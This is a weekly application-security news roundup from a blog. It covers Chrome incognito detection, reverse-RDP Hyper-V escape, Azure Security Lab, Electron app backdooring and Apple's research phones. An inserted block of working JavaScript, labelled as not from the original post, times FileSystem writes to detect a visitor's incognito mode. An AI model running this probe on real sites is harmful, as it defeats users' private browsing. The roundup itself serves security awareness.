Application Security Weekly for August 11

A researcher found that a web page can tell whether a Chrome 76 user is in incognito mode with a timing attack. Chrome 76 stopped disabling the FileSystem API in incognito (the old, easy tell that paywalls used), but incognito storage is backed by memory rather than disk, so a large write finishes measurably faster than it does in a normal profile.

https://blog.jse.li/posts/chrome-76-incognito-filesystem-timing/
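To make the timing check concrete, here is an added illustration of the approach (not code from the linked post or from this blog): ask Chrome for a temporary FileSystem, time a few multi-megabyte writes, and compare the median against a threshold. The write size, sample count and threshold are assumptions that need tuning per machine; the `webkitRequestFileSystem` calls are Chrome's legacy FileSystem API. The decision logic is split into a pure function so it can be exercised outside a browser.

```javascript
// Added example: Chrome 76 incognito detection via FileSystem API write timing.
// Not code from the linked post or from this blog. Idea: in Chrome 76 the
// FileSystem API works in incognito but is memory-backed rather than disk-backed,
// so a large write completes much faster than in a normal profile.

const WRITE_BYTES = 16 * 1024 * 1024;   // assumed: 16 MiB per probe write
const SAMPLES = 3;                       // assumed: take the median of 3 timings
const INCOGNITO_THRESHOLD_MS = 50;       // assumed: tune per machine and disk

// Median of an array of timings (in ms).
function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const mid = Math.floor(s.length / 2);
  return s.length % 2 ? s[mid] : (s[mid - 1] + s[mid]) / 2;
}

// Decide from timing samples. Pure, so it can be unit-tested without a browser.
function classify(timingsMs, thresholdMs = INCOGNITO_THRESHOLD_MS) {
  if (!timingsMs.length) throw new Error('no timing samples');
  const m = median(timingsMs);
  return { medianMs: m, incognito: m < thresholdMs };
}

// Browser-only: time one write of WRITE_BYTES into a temporary FileSystem file.
function timeOneWrite() {
  return new Promise((resolve, reject) => {
    const requestFs = window.webkitRequestFileSystem || window.requestFileSystem;
    if (!requestFs) return reject(new Error('FileSystem API unavailable'));
    // TEMPORARY storage needs no permission prompt in Chrome.
    requestFs.call(window, window.TEMPORARY, WRITE_BYTES, (fs) => {
      fs.root.getFile('probe.bin', { create: true }, (entry) => {
        entry.createWriter((writer) => {
          const start = performance.now();
          writer.onwriteend = () => resolve(performance.now() - start);
          writer.onerror = reject;
          writer.write(new Blob([new Uint8Array(WRITE_BYTES)]));
        }, reject);
      }, reject);
    }, reject);
  });
}

// Run SAMPLES timed writes and classify the result.
async function probeIncognito() {
  const timings = [];
  for (let i = 0; i < SAMPLES; i++) timings.push(await timeOneWrite());
  return classify(timings);
}

// Only auto-run inside a browser page; in Node there is no window or FileSystem API.
if (typeof window !== 'undefined' && typeof module === 'undefined') {
  probeIncognito().then((r) => console.log(r), (e) => console.error(e));
}
```

Paste the block into a page served over HTTP and open the console in a normal and an incognito window: the incognito run should report a much smaller median. Because the threshold depends on the victim's disk, a real probe would calibrate against a known-slow baseline rather than trusting a fixed constant.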


That reverse-RDP attack we talked about earlier, where a malicious RDP server abuses clipboard sharing to drop files onto the connecting client? Yeah, it also works as a guest-to-host escape in Hyper-V, because Hyper-V's enhanced session mode is built on RDP, and Hyper-V is the hypervisor under Azure.

https://thehackernews.com/2019/08/reverse-rdp-windows-hyper-v.html?m=1


In related Azure news, Microsoft has launched Azure Security Lab: a set of isolated Azure hosts where invited researchers can attack live IaaS scenarios without any risk to customer workloads. It is infrastructure testing more than appsec testing, but it is a safe space to do it.

https://msrc-blog.microsoft.com/2019/08/05/azure-security-lab-a-new-space-for-azure-research-and-collaboration/


Context IS published a nice walkthrough of basic Electron framework exploitation. The "bug" is really a property of how Electron packages apps: the application's JavaScript ships in a plain ASAR archive that nothing integrity-checks at runtime, so anyone who can write to the install directory can backdoor a signed, trusted app and keep running code under its name.

https://www.contextis.com/en/blog/basic-electron-framework-exploitation


Frequent readers know that I am no fan of Apple's closed garden when it comes to app testing.  Well, it might be opening a little.  They have enhanced their bug bounty, and more importantly are going to offer quasi-jailbroken phones to researchers.  I'll be in line for that.

https://www.theverge.com/2019/8/8/20756629/apple-iphone-security-research-device-program-vulnerabilities


That's the news!


Bill Sempf

Husband. Father. Pentester. Secure software composer. Brewer. Lockpicker. Ninja. Insurrectionist. Lumberjack. All words that have been used to describe me recently. I help people write more secure software.
